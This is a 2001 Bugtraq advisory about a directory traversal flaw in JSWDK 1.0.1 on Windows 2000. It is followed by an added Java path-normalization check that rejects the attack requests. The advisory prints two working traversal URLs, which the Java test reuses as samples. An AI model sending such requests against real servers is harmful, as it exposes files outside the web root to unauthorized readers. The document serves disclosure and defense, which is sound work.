[19915] in bugtraq
CHINANSL Security Advisory(CSA-200106)
daemon@ATHENA.MIT.EDU (lovehacker)
Wed Mar 28 20:54:57 2001
Message-ID: <20010328064807.21266.qmail@securityfocus.com>
Date: Wed, 28 Mar 2001 06:48:07 -0000
Reply-To: lovehacker@263.NET
From: lovehacker <lovehacker@263.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Topic:
JavaServer Web Dev Kit (JSWDK) 1.0.1 for Win2000
Directory Traversal Vulnerability
vulnerable:
Microsoft Win2000
    + JSWDK 1.0.1
Possibly other operating systems as well.
discussion:
A security vulnerability has been found in Windows
NT/2000 systems that have JSWDK 1.0.1
installed. The vulnerability allows remote attackers to
access files outside the document root directory
scope.
exploits:
http://localhost:8080/examples//WEB-INF/
This request lists the /WEB-INF/ directory.
http://localhost:8080/../examples//WEB-INF/../../../../../
If JSWDK is installed in c:\, this request lists all files
and directories in c:\.
solution:
Update JSWDK
Copyright 2000-2001 CHINANSL. All Rights
Reserved. Terms of use.
CHINANSL Security Team
<lovehacker@chinansl.com>
CHINANSL INFORMATION TECHNOLOGY CO.,LTD
(http://www.chinansl.com)
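
One way a file-serving handler can reject both request shapes shown in the advisory, as an added example that is not part of the original post and not JSWDK code. The class and method names are hypothetical, and the input is assumed to be the URL path after a single percent-decoding pass.

```java
import java.util.ArrayDeque;
import java.util.Deque;

// Added example (hypothetical names): normalize first, then decide.
public class RequestPathCheck {

    /**
     * Returns the normalized path (for example "/examples/index.html") if the
     * request may be served, or null if it climbs above the document root or
     * names the protected WEB-INF directory after normalization.
     * Assumption: rawPath has already been percent-decoded exactly once.
     */
    static String safePath(String rawPath) {
        // On Windows the file system accepts '\' as a separator, so treat it as one.
        String path = rawPath.replace('\\', '/');
        Deque<String> segments = new ArrayDeque<>();
        for (String seg : path.split("/")) {
            if (seg.isEmpty() || seg.equals(".")) {
                continue;                       // collapses "//" and "/./"
            }
            if (seg.equals("..")) {
                if (segments.isEmpty()) {
                    return null;                // would leave the document root
                }
                segments.removeLast();
            } else {
                segments.addLast(seg);
            }
        }
        StringBuilder normalized = new StringBuilder();
        for (String seg : segments) {
            // Windows file names are case-insensitive, so compare that way.
            if (seg.equalsIgnoreCase("WEB-INF")) {
                return null;                    // protected at any depth
            }
            normalized.append('/').append(seg);
        }
        return normalized.length() == 0 ? "/" : normalized.toString();
    }

    public static void main(String[] args) {
        String[] constructed = {                // constructed sample requests
            "/examples/index.html",
            "/examples//WEB-INF/",
            "/../examples//WEB-INF/../../../../../",
            "/examples/./jsp/../index.html"
        };
        for (String request : constructed) {
            String result = safePath(request);
            System.out.println(request + " -> " + (result == null ? "REJECT" : result));
        }
    }
}
```

The access decision is made on the normalized path only, and the same normalized string is what should be joined to the document root when the file is opened.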